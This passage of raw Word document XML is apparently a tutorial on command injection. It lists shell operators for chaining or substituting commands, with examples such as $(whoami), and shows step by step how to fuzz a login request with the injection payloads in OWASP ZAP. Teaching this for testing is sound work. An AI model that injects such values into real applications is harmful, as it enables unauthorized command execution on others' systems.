    <w:p w:rsidR="0473AF89" w:rsidP="0473AF89" w:rsidRDefault="0473AF89" w14:paraId="4C4FE14B" w14:textId="032823AF">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="35076ADA" w:rsidP="0473AF89" w:rsidRDefault="35076ADA" w14:paraId="04AB477C" w14:textId="5EF51814">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="162" w:beforeAutospacing="off" w:after="54" w:afterAutospacing="off"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidRPr="0473AF89" w:rsidR="35076ADA">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Special Characters for Command Injection</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35076ADA" w:rsidP="0473AF89" w:rsidRDefault="35076ADA" w14:paraId="07B8240D" w14:textId="2A64A6B4">
      <w:pPr>
        <w:spacing w:before="68" w:beforeAutospacing="off" w:after="135" w:afterAutospacing="off"/>
        <w:rPr/>
      </w:pP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The following special character can be used for command injection such as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&amp;</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&gt;</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&lt;</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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35076ADA" w:rsidP="0473AF89" w:rsidRDefault="35076ADA" w14:paraId="7CFFBD36" w14:textId="1CC4B0A2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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cmd1|cmd2</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 Uses of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will make command 2 to be executed whether command 1 execution is successful or not.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35076ADA" w:rsidP="0473AF89" w:rsidRDefault="35076ADA" w14:paraId="376B3F26" w14:textId="7CAF7E7E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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cmd1;cmd2</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 Uses of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will make command 2 to be executed whether command 1 execution is successful or not.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35076ADA" w:rsidP="0473AF89" w:rsidRDefault="35076ADA" w14:paraId="0F6AA153" w14:textId="10B2A87B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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cmd1||cmd2</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 Command 2 will only be executed if command 1 execution fails.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35076ADA" w:rsidP="0473AF89" w:rsidRDefault="35076ADA" w14:paraId="7019819E" w14:textId="61E91652">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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cmd1&amp;&amp;cmd2</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 Command 2 will only be executed if command 1 execution succeeds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35076ADA" w:rsidP="0473AF89" w:rsidRDefault="35076ADA" w14:paraId="522BCC0A" w14:textId="2BA815AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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$(cmd)</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 For example,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echo $(whoami)</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or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$(touch test.sh; echo 'ls' &gt; test.sh)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35076ADA" w:rsidP="0473AF89" w:rsidRDefault="35076ADA" w14:paraId="2BBA0D51" w14:textId="6C7DF5A3">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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cmd</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 It’s used to execute a specific command. For example,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whoami</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35076ADA" w:rsidP="0473AF89" w:rsidRDefault="35076ADA" w14:paraId="22DB553D" w14:textId="614B810D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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&gt;(cmd)</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&gt;(ls)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="35076ADA" w:rsidP="0473AF89" w:rsidRDefault="35076ADA" w14:paraId="45DFDB41" w14:textId="2100F031">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pP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&lt;(cmd)</w:t>
      </w:r>
      <w:r w:rsidRPr="0473AF89" w:rsidR="35076ADA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="0473AF89" w:rsidR="35076ADA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas" w:cs="Consolas"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
          <w:caps w:val="0"/>
          <w:smallCaps w:val="0"/>
          <w:noProof w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1" w:themeTint="FF" w:themeShade="FF"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>&lt;(ls)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0473AF89" w:rsidP="0473AF89" w:rsidRDefault="0473AF89" w14:paraId="5F2D5D3D" w14:textId="483D4DB5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0473AF89" w:rsidP="0473AF89" w:rsidRDefault="0473AF89" w14:paraId="5E41EB40" w14:textId="69092E58">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="130E019A" w:rsidP="0473AF89" w:rsidRDefault="130E019A" w14:paraId="4492002A" w14:textId="40F37563">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="130E019A">
        <w:drawing>
          <wp:inline wp14:editId="1CB4DC7F" wp14:anchorId="1FE87819">
            <wp:extent cx="4572000" cy="2400300"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="364044239" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R54f48be80f22462b">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0473AF89" w:rsidP="0473AF89" w:rsidRDefault="0473AF89" w14:paraId="7A5DFF3B" w14:textId="30B027E4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="130E019A" w:rsidP="0473AF89" w:rsidRDefault="130E019A" w14:paraId="19D7C72C" w14:textId="54F20815">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="130E019A">
        <w:drawing>
          <wp:inline wp14:editId="1B80A0F4" wp14:anchorId="7CD7A89B">
            <wp:extent cx="4572000" cy="2305050"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="153682328" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R54fde74e00f7472f">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0473AF89" w:rsidP="0473AF89" w:rsidRDefault="0473AF89" w14:paraId="4CC261DE" w14:textId="18256CC6">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="130E019A" w:rsidP="0473AF89" w:rsidRDefault="130E019A" w14:paraId="7E27BD48" w14:textId="555263C4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="130E019A">
        <w:rPr/>
        <w:t>Request and Response in ZAP tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="130E019A" w:rsidP="0473AF89" w:rsidRDefault="130E019A" w14:paraId="2D9C3382" w14:textId="1BD733C1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="130E019A">
        <w:drawing>
          <wp:inline wp14:editId="0E87F403" wp14:anchorId="66EB6B2F">
            <wp:extent cx="4572000" cy="2057400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1734840257" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="Rcd22185a164246bc">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0473AF89" w:rsidP="0473AF89" w:rsidRDefault="0473AF89" w14:paraId="05489C41" w14:textId="2F8D01AA">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="130E019A" w:rsidP="0473AF89" w:rsidRDefault="130E019A" w14:paraId="56B9191A" w14:textId="2F72602B">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="130E019A">
        <w:rPr/>
        <w:t>Right click on the Post method &gt; Attack &gt; Fuzz</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="130E019A" w:rsidP="0473AF89" w:rsidRDefault="130E019A" w14:paraId="59F97D12" w14:textId="5A4592F5">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="130E019A">
        <w:drawing>
          <wp:inline wp14:editId="74DD041A" wp14:anchorId="5B2843C5">
            <wp:extent cx="4572000" cy="2457450"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1600378599" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R95f7930797d94ade">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449E37A7" w:rsidP="0473AF89" w:rsidRDefault="449E37A7" w14:paraId="6D23871E" w14:textId="68ABED50">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off"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374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="130E019A" w:rsidP="0473AF89" w:rsidRDefault="130E019A" w14:paraId="10D757DC" w14:textId="468177C3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:before="0" w:beforeAutospacing="off" w:after="0" w:afterAutospacing="off"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="130E019A">
        <w:drawing>
          <wp:inline wp14:editId="7F2B65A7" wp14:anchorId="2C27E817">
            <wp:extent cx="4572000" cy="2362200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="731639973" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R9ce6135f267f4a5a">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449E37A7" w:rsidP="449E37A7" w:rsidRDefault="449E37A7" w14:paraId="438A2585" w14:textId="0FF155E7">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="130E019A" w:rsidP="0473AF89" w:rsidRDefault="130E019A" w14:paraId="017632FE" w14:textId="1843B38D">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="130E019A">
        <w:rPr/>
        <w:t xml:space="preserve">Select Username text click on ADD dialogue box will be </w:t>
      </w:r>
      <w:r w:rsidR="130E019A">
        <w:rPr/>
        <w:t>opene</w:t>
      </w:r>
      <w:r w:rsidR="130E019A">
        <w:rPr/>
        <w:t xml:space="preserve">d </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0473AF89" w:rsidP="0473AF89" w:rsidRDefault="0473AF89" w14:paraId="52980066" w14:textId="4DA5608A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0473AF89" w:rsidP="0473AF89" w:rsidRDefault="0473AF89" w14:paraId="6698BCC7" w14:textId="2FF537D9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="130E019A" w:rsidP="0473AF89" w:rsidRDefault="130E019A" w14:paraId="36081613" w14:textId="29035B4C">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="-20" w:right="-20"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="130E019A">
        <w:drawing>
          <wp:inline wp14:editId="35289C42" wp14:anchorId="7F192E71">
            <wp:extent cx="4572000" cy="3000375"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2126432013" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R8db05e24e364456a">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55820FFD" w:rsidP="55820FFD" w:rsidRDefault="55820FFD" w14:paraId="257635BF" w14:textId="7975E0A9">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0473AF89" w:rsidR="130E019A">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Click on</w:t>
      </w:r>
      <w:r w:rsidRPr="0473AF89" w:rsidR="7BB68E59">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri" w:asciiTheme="minorAscii" w:hAnsiTheme="minorAscii" w:eastAsiaTheme="minorAscii" w:cstheme="minorAscii"/>
          <w:noProof w:val="0"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> ADD select type as File Fuzzers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="130E019A" w:rsidP="0473AF89" w:rsidRDefault="130E019A" w14:paraId="63301AC2" w14:textId="0A0CFE18">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="130E019A">
        <w:drawing>
          <wp:inline wp14:editId="2B004E3C" wp14:anchorId="6164B147">
            <wp:extent cx="5943600" cy="3990975"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1299557588" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R59cee8d62b0d4141">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3990975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0473AF89" w:rsidP="0473AF89" w:rsidRDefault="0473AF89" w14:paraId="46412BBB" w14:textId="138FC1C2">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0473AF89" w:rsidP="0473AF89" w:rsidRDefault="0473AF89" w14:paraId="22DAE9F8" w14:textId="510EE428">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="7090C90A" w:rsidP="0473AF89" w:rsidRDefault="7090C90A" w14:paraId="11B03364" w14:textId="210BA0F8">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="7090C90A">
        <w:rPr/>
        <w:t>Jborfuzz</w:t>
      </w:r>
      <w:r w:rsidR="7090C90A">
        <w:rPr/>
        <w:t xml:space="preserve"> &gt; Injection </w:t>
      </w:r>
      <w:r w:rsidR="7090C90A">
        <w:rPr/>
        <w:t>clicks</w:t>
      </w:r>
      <w:r w:rsidR="7090C90A">
        <w:rPr/>
        <w:t xml:space="preserve"> on add</w:t>
      </w:r>
      <w:r w:rsidR="7090C90A">
        <w:drawing>
          <wp:inline wp14:editId="3D21020F" wp14:anchorId="6824DC28">
            <wp:extent cx="5943600" cy="3962400"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="222089995" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R752635ddf72847c4">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w:rsidR="7090C90A" w:rsidP="0473AF89" w:rsidRDefault="7090C90A" w14:paraId="7C73415F" w14:textId="4969F134">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="7090C90A">
        <w:rPr/>
        <w:t xml:space="preserve">Click on “Start </w:t>
      </w:r>
      <w:r w:rsidR="7090C90A">
        <w:rPr/>
        <w:t>Fuzzer</w:t>
      </w:r>
      <w:r w:rsidR="7090C90A">
        <w:rPr/>
        <w:t>” button</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="7090C90A" w:rsidP="0473AF89" w:rsidRDefault="7090C90A" w14:paraId="715F311B" w14:textId="37B763A1">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidR="7090C90A">
        <w:drawing>
          <wp:inline wp14:editId="06589C5A" wp14:anchorId="770255A8">
            <wp:extent cx="4572000" cy="3057525"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="571048678" name="" title=""/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="R63cba6c0450c4c3b">
                      <a:extLst>
                        <a:ext xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="3057525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0473AF89" w:rsidP="0473AF89" w:rsidRDefault="0473AF89" w14:paraId="21A96B36" w14:textId="741C8BBC">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0473AF89" w:rsidP="0473AF89" w:rsidRDefault="0473AF89" w14:paraId="3626681A" w14:textId="4B684120">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr/>
      </w:pPr>
    </w:p>
